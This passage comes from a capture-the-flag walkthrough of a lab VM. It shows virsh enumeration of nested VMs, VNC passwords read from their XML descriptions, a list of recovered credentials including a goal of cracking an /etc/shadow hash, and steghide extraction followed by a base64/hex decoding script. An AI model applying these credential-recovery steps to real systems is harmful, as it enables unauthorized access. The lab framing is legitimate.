  1031. - decrypt nleeson's /etc/shadow password
  1032. - Flag 2: It will include a final challenge to confirm you hit the jackpot.
  1033.  
  1034.  
  1035. virsh # list
  1036. Id Name State
  1037. ----------------------------------------------------
  1038. 2 puppet running
  1039. 3 barringsbank running
  1040.  
  1041. virsh # dominfo puppet
  1042. Id: 2
  1043. Name: puppet
  1044. UUID: 3561f84c-71c3-f16f-4a7b-9097e7d2ac39
  1045. OS Type: hvm
  1046. State: running
  1047. CPU(s): 1
  1048. CPU time: 5244.9s
  1049. Max memory: 1048576 KiB
  1050. Used memory: 1048576 KiB
  1051. Persistent: yes
  1052. Autostart: enable
  1053. Managed save: no
  1054. Security model: apparmor
  1055. Security DOI: 0
  1056. Security label: libvirt-3561f84c-71c3-f16f-4a7b-9097e7d2ac39 (enforcing)
  1057.  
  1058. virsh # dominfo barringsbank
  1059. Id: 3
  1060. Name: barringsbank
  1061. UUID: 6cf27edd-7559-d6eb-1502-d3135c807785
  1062. OS Type: hvm
  1063. State: running
  1064. CPU(s): 1
  1065. CPU time: 3738.7s
  1066. Max memory: 1048576 KiB
  1067. Used memory: 1048576 KiB
  1068. Persistent: yes
  1069. Autostart: enable
  1070. Managed save: no
  1071. Security model: apparmor
  1072. Security DOI: 0
  1073. Security label: libvirt-6cf27edd-7559-d6eb-1502-d3135c807785 (enforcing)
  1074.  
  1075. virsh #
  1076.  
  1077. dumpxml puppet
  1078. <domain type='qemu' id='2'>
  1079. <name>puppet</name>
  1080. <uuid>3561f84c-71c3-f16f-4a7b-9097e7d2ac39</uuid>
  1081. <description>puppetmaster if you mess with this VM I will sendyoubacktowalker</description>
  1082.  
  1083. vncviewer 127.0.0.1:5900
  1084. password sendyoubacktowalker
  1085.  
  1086.  
  1087. virsh # dumpxml barringsbank
  1088. <domain type='qemu' id='3'>
  1089. <name>barringsbank</name>
  1090. <uuid>6cf27edd-7559-d6eb-1502-d3135c807785</uuid>
  1091. <description>Who do you think you are...? David Lightman from memphistennessee...?</description>
  1092.  
  1093.  
  1094. vncviewer 127.0.0.1:5901
  1095. password memphistennessee...
  1096. (but David Lightman was from Seattle, Washington??)
  1097.  
  1098.  
  1099. With that, we've completed the challenges!
  1100.  
  1101.  
  1102. so far I have:
  1103. - Troll Flag - flag.txt
1104. - Flag1.txt.0xff, which gave us the hint for the password "secret" to decode the gpg file
1105. > - Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am. < reference for secret/wargames
1106. - ssh-rsa key passphrase joshua (which was also given as a hint on the same server from which we got flag1)
1107. - root on eric, sandie and nleeson via exploits/password discovery
1108. - vncviewer 127.0.0.1:5901 / password memphistennessee...
1109. - vncviewer 127.0.0.1:5900 / password sendyoubacktowalker
1110. - have access to the bank server over VNC, but don't know the root or user passwords for the login prompt;
1111. we do have the ssh-rsa key, so we can ssh in as nleeson with passphrase joshua using the decrypted key
  1112.  
1113. As of now, I don't know what else there could be to do other than crack the /etc/shadow hash for nleeson, which isn't needed to gain root on the bank server.
  1114.  
  1115. Def feel like I missed something, but I had a lot of fun working my way through this CTF.
  1116.  
1117. Spoke with the OP on Twitter, who gave me a hint for this one. Inspecting the images, we find a hidden message in me.jpg.
  1118.  
  1119. root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
  1120. "me.jpg":
  1121. format: jpeg
  1122. capacity: 11.9 KB
  1123. Try to get information about embedded data ? (y/n) y
  1124. Enter passphrase:
  1125. steghide: could not extract any data with that passphrase!
  1126. root@kali:~/HDD2/ctf/analouge-pond# steghide --info me.jpg
  1127. "me.jpg":
  1128. format: jpeg
  1129. capacity: 11.9 KB
  1130. Try to get information about embedded data ? (y/n) y
  1131. Enter passphrase:
  1132. embedded file "primate_egyptian_flag.txt":
  1133. size: 3.7 KB
  1134. encrypted: rijndael-128, cbc
  1135. compressed: yes
  1136. root@kali:~/HDD2/ctf/analouge-pond#
  1137.  
  1138.  
  1139. steghide --extract -sf me.jpg
  1140. Enter passphrase: reticulatingsplines
  1141. wrote extracted data to "primate_egyptian_flag.txt".
  1142. root@kali:~/HDD2/ctf/analouge-pond#
  1143.  
  1144.  
  1145. cat primate_egyptian_flag.txt | xxd -r -p | rev | base64 -d
  1146.  
  1147. Here's a fender bass for you...
  1148.  
  1149. ,-. _.---._
  1150. | `\.__.-'' `.
  1151. \ _ _ ,. \
  1152. ,+++=._________________)_||______|_|_|| |
  1153. (_.ooo.===================||======|=|=|| |
  1154. ~~' | ~' `~' o o /
  1155. \ /~`\ o o /
  1156. `~' `-.____.-'
  1157.  
  1158.  
  1159. Congratulations to you once again and for the sixth time on capturing this
  1160. flag!
  1161.  
  1162. I've tried to mix things up a bit here, to move away from throw metasploit
  1163. and web exploits at things. I hope you have enjoyed that portion and your
  1164. feedback on this aspect would be appreciated.
  1165.  
  1166. Of note, these VMs are set to do automatic security updates using puppet,
  1167. so this ought to keep things dynamic enough for people.
  1168.  
  1169. Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF.
  1170.  
  1171. A special thank you to g0tmi1k for hosting all these challenges and the
  1172. valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit
  1173. me on IRC or twitter if you are looking for a hint or have completed the
  1174. challenge.
  1175.  
  1176. Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In
  1177. The North (C) BBC 1995.. What's the connection....?
  1178. --Knightmare
  1179.  
  1180.  
  1181. Awesome!
  1182.  
  1183. https://www.youtube.com/watch?v=ChwPpktNqe0
  1184. New Orleans, Baton Rouge and The Rising Sun
  1185. Also the commonality of "war"?
  1186.  
  1187. :)
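Both flag1.txt.0xff and primate_egyptian_flag.txt were unwrapped with the same one-liner, `xxd -r -p | rev | base64 -d`. The following is an added example, not code from the walkthrough, that writes that pipeline out in Python next to the matching encoder, so the layering (base64, then the text reversed, then hex-encoded) is explicit and can be checked by round-tripping. FLAG1_HEX is the value printed from /root/protovision/flag1.txt.0xff above; note that `rev` reverses each line separately, so the Python version assumes the hex decodes to a single line, as it does here.

```python
"""Decode and re-encode the hex / reversed / base64 wrapping used for the flags."""
import base64

# Contents of /root/protovision/flag1.txt.0xff as shown on this page.
FLAG1_HEX = "3d3d674c7534795a756c476130565762764e4849793947496c4a585a6f5248496b4a3362334e3363684248496842435a756c6d5a675148616e6c5762675533623542434c756c47497a564764313557617442794d79415362764a6e5a674d585a7446325a79463256676732593046326467777961793932646751334a754e585a765247497a6c47613042695a4a4279615535454d70647a614b706b5a48316a642f67325930463264763032626a35535a6956486431395765756333643339794c364d486330524861"


def decode_flag(hex_text):
    """xxd -r -p (hex to bytes, whitespace ignored), rev (reverse), base64 -d."""
    reversed_b64 = bytes.fromhex("".join(hex_text.split()))
    # validate=True rejects anything that is not base64, which catches a
    # wrong layer order (e.g. forgetting the reverse) instead of returning junk.
    return base64.b64decode(reversed_b64[::-1], validate=True).decode()


def encode_flag(message):
    """The inverse: base64-encode, reverse the text, then hex-encode it."""
    return base64.b64encode(message.encode())[::-1].hex()


if __name__ == "__main__":
    text = decode_flag(FLAG1_HEX)
    print(text)
    print("round trip ok:", encode_flag(text) == FLAG1_HEX)
```

The same decode_flag() call works on the steghide payload primate_egyptian_flag.txt, since it uses the identical wrapping.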